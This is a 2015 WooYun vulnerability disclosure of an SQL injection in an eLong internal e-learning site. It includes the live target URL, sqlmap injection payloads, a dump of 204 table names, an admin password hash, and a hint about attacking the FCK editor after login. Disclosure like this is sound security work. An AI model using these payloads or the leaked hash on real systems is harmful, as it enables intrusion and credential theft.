当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0103324

漏洞标题:艺龙旅行网某处系统SQL注入

相关厂商:艺龙旅行网

漏洞作者: jianFen

提交时间:2015-03-24 09:20

修复时间:2015-05-09 11:04

公开时间:2015-05-09 11:04

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:16

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-24: 细节已通知厂商并且等待厂商处理中
2015-03-25: 厂商已经确认,细节仅向厂商公开
2015-04-04: 细节向核心白帽子及相关领域专家公开
2015-04-14: 细节向普通白帽子公开
2015-04-24: 细节向实习白帽子公开
2015-05-09: 细节向公众公开

简要描述:

详细说明:

注入点
http://elearning.corp.elong.com/Showknowledge.aspx?id=214
必须10S以上延迟不然报错

-dbs --time-sec 10


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=212 AND 8115=8115
    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: id=-3129 UNION ALL SELECT NULL, NULL, CHAR(58)+CHAR(113)+CHAR(112)+CHAR(121)+CHAR(58)+CHAR(66)+CHAR(103)+CHAR(111)+CHAR(83)+CHAR(119)+CHAR(113)+CHAR(85)+CHAR(113)+CHAR(109)+CHAR(102)+CHAR(58)+CHAR(114)+CHAR(104)+CHAR(114)+CHAR(58), NULL, NULL-- 
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: id=212; WAITFOR DELAY '0:0:10';--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: id=212 WAITFOR DELAY '0:0:10'--
---
Database: elonglearning
[204 tables]
+----------------------------+
| dbo.Ability                |
| dbo.Appliance              |
| dbo.Appraise               |
| dbo.BorrowReturnRecord     |
| dbo.Business               |
| dbo.BusinessRole           |
| dbo.CStation               |
| dbo.CUsers                 |
| dbo.Card                   |
| dbo.CardClass              |
| dbo.CardFee                |
| dbo.CasesClass             |
| dbo.Cbusiness              |
| dbo.CertificateRecord      |
| dbo.ChatContent            |
| dbo.ChooseType             |
| dbo.Class                  |
| dbo.CouncilUser            |
| dbo.CourseAchieve          |
| dbo.CourseAchieveUser      |
| dbo.CourseAchieveUser1     |
| dbo.CourseClass            |
| dbo.CourseClassUser        |
| dbo.CourseClassZu          |
| dbo.CourseDataInfo         |
| dbo.CourseExam             |
| dbo.CourseExamUser         |
| dbo.CourseJR               |
| dbo.CourseRes              |
| dbo.CourseResIng           |
| dbo.CourseResUser          |
| dbo.CourseSort             |
| dbo.CourseSortGovernor     |
| dbo.CourseState            |
| dbo.CourseStructure        |
| dbo.CourseSu               |
| dbo.CourseTeacherNum       |
| dbo.CourseUser             |
| dbo.CourseUserSel          |
| dbo.CourseValue            |
| dbo.CourseView             |
| dbo.CourseWare             |
| dbo.Courses                |
| dbo.CousePlan              |
| dbo.Demand                 |
| dbo.DemandCourse           |
| dbo.DemandCourseDept       |
| dbo.DemandCourseDeptMain   |
| dbo.DemandCourseMain       |
| dbo.DemandCourseUser       |
| dbo.DemandDept             |
| dbo.DemandDeptMain         |
| dbo.DemandMain             |
| dbo.DemandMains            |
| dbo.DeptPlan               |
| dbo.DeptUser               |
| dbo.DeptUserCourseData     |
| dbo.DeptUsers              |
| dbo.Directory              |
| dbo.Episteme               |
| dbo.EpistemeClass          |
| dbo.ExamAuthority          |
| dbo.ExamCourse             |
| dbo.ExamCourse1            |
| dbo.ExamCourseUserWWC      |
| dbo.ExamDataInfo           |
| dbo.ExamKC                 |
| dbo.ExamMain               |
| dbo.ExamPaper              |
| dbo.ExamSu                 |
| dbo.ExamUser               |
| dbo.ExamUserMain           |
| dbo.ExamUsers              |
| dbo.ExecuteCourse          |
| dbo.Expense                |
| dbo.Feedback               |
| dbo.Goods                  |
| dbo.Governor               |
| dbo.Ground                 |
| dbo.GroupCourseExamUser    |
| dbo.Groups                 |
| dbo.Info                   |
| dbo.JGType                 |
| dbo.JoinResearch           |
| dbo.KC                     |
| dbo.KD                     |
| dbo.LearningTime           |
| dbo.LoginField             |
| dbo.Manager                |
| dbo.ManagesUser            |
| dbo.Message                |
| dbo.Messages               |
| dbo.MessagesUser           |
| dbo.NetWorkCourseSort      |
| dbo.NetWorkCourseSort1     |
| dbo.NewCourseData          |
| dbo.NewDeptTrainData       |
| dbo.NewExamData            |
| dbo.NewExamTestData        |
| dbo.News                   |
| dbo.NewsType               |
| dbo.OffLineExam            |
| dbo.OffLineExam2           |
| dbo.OffLineExam3           |
| dbo.OffLineExamUser        |
| dbo.OfflineCourses         |
| dbo.OutTrain               |
| dbo.PGtype                 |
| dbo.PXTeacher              |
| dbo.PXZUsers               |
| dbo.PersonPlan             |
| dbo.PlanCourse             |
| dbo.PlanCourses            |
| dbo.ProFunds               |
| dbo.Progress               |
| dbo.Pxhy                   |
| dbo.Pxjg                   |
| dbo.RY                     |
| dbo.Record                 |
| dbo.Research               |
| dbo.ResearchKey            |
| dbo.ResearchSubject        |
| dbo.ReturnDetail           |
| dbo.RlShowTeacherPlan      |
| dbo.Roles                  |
| dbo.RolesRules             |
| dbo.SHView                 |
| dbo.SelCourseExamUser      |
| dbo.Station                |
| dbo.StationAbility         |
| dbo.StationApprove         |
| dbo.StationApproveUser     |
| dbo.StationApproveZu       |
| dbo.StationCourseClass     |
| dbo.StationCourseClassUser |
| dbo.StationCourseUser      |
| dbo.StrCourse              |
| dbo.Structure              |
| dbo.StudyTotalNum          |
| dbo.Stuff                  |
| dbo.StuffClass             |
| dbo.SubjectDetail          |
| dbo.SubjectDetails         |
| dbo.SubjectTactic          |
| dbo.SubjectType            |
| dbo.SysRules               |
| dbo.TeachRecord            |
| dbo.TeacherCourseNum       |
| dbo.TeacherPlan            |
| dbo.TeacherType            |
| dbo.Teachers               |
| dbo.Templet                |
| dbo.TextBooks              |
| dbo.Titles                 |
| dbo.Tklx                   |
| dbo.TotalNum               |
| dbo.TrainClass             |
| dbo.TrainData              |
| dbo.TrainExpense           |
| dbo.TrainPersons           |
| dbo.TrainPlan              |
| dbo.TrainTime              |
| dbo.TrainType              |
| dbo.UserCourse             |
| dbo.UserExam               |
| dbo.UserGoods              |
| dbo.UserGroup              |
| dbo.UserInfo               |
| dbo.UserMessage            |
| dbo.UserPoint              |
| dbo.UserStructureTable     |
| dbo.UserStructures         |
| dbo.UserTables             |
| dbo.UserTactic             |
| dbo.UserToExam             |
| dbo.UserZS                 |
| dbo.Users                  |
| dbo.Uusers                 |
| dbo.WareType               |
| dbo.XXCoursePlan           |
| dbo.XXPersonData           |
| dbo.XXPlanPersonNum        |
| dbo.Years                  |
| dbo.ZCType                 |
| dbo.cases                  |
| dbo.casesing               |
| dbo.dtproperties           |
| dbo.exammainpaper          |
| dbo.jhfw                   |
| dbo.jhmb                   |
| dbo.jhsq                   |
| dbo.rz                     |
| dbo.sysdiagrams            |
| dbo.sysfilei               |
| dbo.tables                 |
| dbo.totoalstudynum         |
| dbo.upload                 |
| dbo.vadmin                 |
| dbo.vadminlog              |
| dbo.vkilluser              |
| dbo.vpsconf                |
| dbo.vroominfo              |
| dbo.vroomtype              |
| dbo.vuserinfo              |
+----------------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=212 AND 8115=8115
    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: id=-3129 UNION ALL SELECT NULL, NULL, CHAR(58)+CHAR(113)+CHAR(112)+CHAR(121)+CHAR(58)+CHAR(66)+CHAR(103)+CHAR(111)+CHAR(83)+CHAR(119)+CHAR(113)+CHAR(85)+CHAR(113)+CHAR(109)+CHAR(102)+CHAR(58)+CHAR(114)+CHAR(104)+CHAR(114)+CHAR(58), NULL, NULL-- 
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: id=212; WAITFOR DELAY '0:0:10';--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: id=212 WAITFOR DELAY '0:0:10'--
---
Database: elonglearning
Table: dbo.vadmin
[1 entry]
+---------+-----------+----------------------------------+
| adminid | psysadmin | adminpass                        |
+---------+-----------+----------------------------------+
| admin   | <blank>   | 0146636BB87967E6A4DC4B80BE9E610F |
+---------+-----------+----------------------------------+

漏洞证明:

+---------+-----------+----------------------------------+
| adminid | psysadmin | adminpass |
+---------+-----------+----------------------------------+
| admin | <blank> | 0146636BB87967E6A4DC4B80BE9E610F |
+---------+-----------+----------------------------------+
虽然爆了密码但是怎么试都不对
如果登入后台 FCK还是很好搞的

修复方案:

修复sql注入

版权声明:转载请注明来源 jianFen@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-03-25 11:03

厂商回复:

感谢白帽子提醒,我们会尽快修复

最新状态:

暂无

漏洞评价:

评论

  1. 2015-03-24 09:40 | s3xy ( 核心白帽子 | Rank:832 漏洞数:113 | 相濡以沫,不如相忘于江湖)

    mark